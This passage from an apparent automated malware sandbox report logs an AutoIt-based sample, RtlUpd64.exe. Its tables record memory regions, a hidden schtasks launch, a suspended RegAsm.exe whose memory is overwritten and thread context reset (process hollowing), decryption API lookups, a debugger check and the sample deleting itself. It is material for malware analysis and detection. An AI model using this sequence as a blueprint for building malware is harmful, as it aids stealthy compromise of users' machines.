|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Process #18: rtlupd64.exe
242
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe |
| Command Line | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:38, Reason: Child Process |
| Unmonitor | End Time: 00:02:07, Reason: Self Terminated |
| Monitor Duration | 00:00:29 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x15c |
| Parent PID | 0x6e4 (c:\windows\system32\taskeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
94C
0x
BB8
0x
BB0
0x
BAC
0x
1CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x001e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x002f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00300fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00360000 | 0x003bbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| oleaccrc.dll | 0x003e0000 | 0x003e0fff | Memory Mapped File | r |
|
|
|
- |
| rtlupd64.exe | 0x003f0000 | 0x006bdfff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x0079efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007b0fff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x007c0000 | 0x007c3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x00bd0000 | 0x00beffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c30fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00c40000 | 0x00c43fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x01c4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c50000 | 0x01c50000 | 0x01cf8fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01c50000 | 0x01f1efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x020c0fff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db | 0x02020000 | 0x0204ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02050000 | 0x020b5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000020c0000 | 0x020c0000 | 0x020c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x02170fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x02125fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000020d0000 | 0x020d0000 | 0x020d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000020e0000 | 0x020e0000 | 0x020e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x02180000 | 0x021bbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x0237ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002390000 | 0x02390000 | 0x024d1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002470000 | 0x02470000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a20000 | 0x02a20000 | 0x02e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002e20000 | 0x02e20000 | 0x03212fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003320000 | 0x03320000 | 0x0371ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003770000 | 0x03770000 | 0x03b6ffff | Private Memory | rw |
|
|
|
- |
| oleacc.dll | 0x6da80000 | 0x6dabbfff | Memory Mapped File | rwx |
|
|
|
- |
| ieframe.dll | 0x6dac0000 | 0x6e53ffff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x6ec40000 | 0x6ec46fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x70e70000 | 0x70ea1fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x70f00000 | 0x70f4bfff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x724b0000 | 0x724c1fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x73d20000 | 0x73d32fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74420000 | 0x74426fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74430000 | 0x7444bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x748d0000 | 0x749c4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74a10000 | 0x74badfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f80000 | 0x74f88fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x750e0000 | 0x750f6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75a30000 | 0x75a3afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75aa0000 | 0x75aabfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75ab0000 | 0x75bccfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c00000 | 0x75c11fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75c70000 | 0x75c96fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76b60000 | 0x76b94fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x76d60000 | 0x76e95fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77030000 | 0x77124fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x77230000 | 0x772aafff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x77410000 | 0x775acfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x775b0000 | 0x777aafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x77890000 | 0x778d4fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77a30000 | 0x77a34fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77b00000 | 0x77b05fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (22)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\JPenUM\AppData\Local\Temp\b106484eb915e4ad6df697dc1442cbff-EDITED.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe:Zone.Identifier | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\appmgr | type = file_attributes |
|
3 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | type = file_attributes |
|
3 | |
| Get Info | RtlUpd64.exe | type = file_attributes |
|
2 | |
| Get Info | appmgr | type = file_attributes |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Delete | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | - |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Control Panel\Mouse | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Mouse | value_name = SwapMouseButtons, data = 48 |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | os_pid = 0xb18, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | schtasks | show_window = SW_HIDE |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | os_tid = 0x94c |
|
1 | |
| Set Context | c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | os_tid = 0x94c |
|
1 | |
| Resume | c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | os_tid = 0x94c |
|
1 |
Memory (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 352256 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x400000, protection = PAGE_READONLY, size = 512 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x402000, protection = PAGE_EXECUTE_READ, size = 326948 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x452000, protection = PAGE_READONLY, size = 720 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x454000, protection = PAGE_READONLY, size = 12 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x7ffd9008, size = 4 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x400000, size = 352256 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x7ffd9008, size = 4 |
|
1 |
Module (97)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x777b0000 |
|
19 | |
| Load | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | base_address = 0x3f0000 |
|
2 | |
| Load | Advapi32.dll | base_address = 0x76f70000 |
|
1 | |
| Load | kernel32 | base_address = 0x777b0000 |
|
3 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x777b0000 |
|
1 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe, file_name_orig = C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe, file_name_orig = C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe, size = 32767 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7780418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x77801f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x77801e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x778076e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x77803879 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x777b24d8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x777e2111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x777f2510 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x777eb009 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779089be |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x778fc02a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x778fc0d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x777e3f78 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77908bfb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x778fb567 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77925998 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x778f2251 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x778f28f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x777e2004 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x77839aa9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7783f3cf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7780ebc6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7784f29f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x777e53a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7784f21a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7783f70b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7783f71b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7783f72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x777eeb4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x777ebc0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64RevertWow64FsRedirection, address_out = 0x7783f5f9 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64DisableWow64FsRedirection, address_out = 0x777ebc0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateMutexW, address_out = 0x777f2aee |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x777fbf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindResourceW, address_out = 0x777f3e61 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SizeofResource, address_out = 0x777f3e7f |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadResource, address_out = 0x777f984d |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LockResource, address_out = 0x777efd29 |
|
3 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContext, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x76f791dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptCreateHash, address_out = 0x76f7df4e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptHashData, address_out = 0x76f7df36 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDeriveKey, address_out = 0x76fb3188 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyHash, address_out = 0x76f7df66 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDecrypt, address_out = 0x76fb3178 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyKey, address_out = 0x76f7c51a |
|
2 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x76f7e124 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x77802fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenProcess, address_out = 0x777f59d7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x77801da4 |
|
2 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | AutoIt v3 | class_name = AutoIt v3, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 |
System (91)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 750 milliseconds (0.750 seconds) |
|
11 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
62 | |
| Get Time | type = System Time, time = 2019-01-21 16:20:08 (UTC) |
|
15 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = AuditNativeSnapIn |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | - |
|
1 |
Process #19: regasm.exe
8
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe |
| Command Line | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:49, Reason: Child Process |
| Unmonitor | End Time: 00:02:03, Reason: Self Terminated |
| Monitor Duration | 00:00:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb18 |
| Parent PID | 0x15c (c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AF4
0x
B08
0x
B10
0x
AD0
0x
A4C
0x
458
0x
42C
0x
B8C
0x
424
0x
BA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
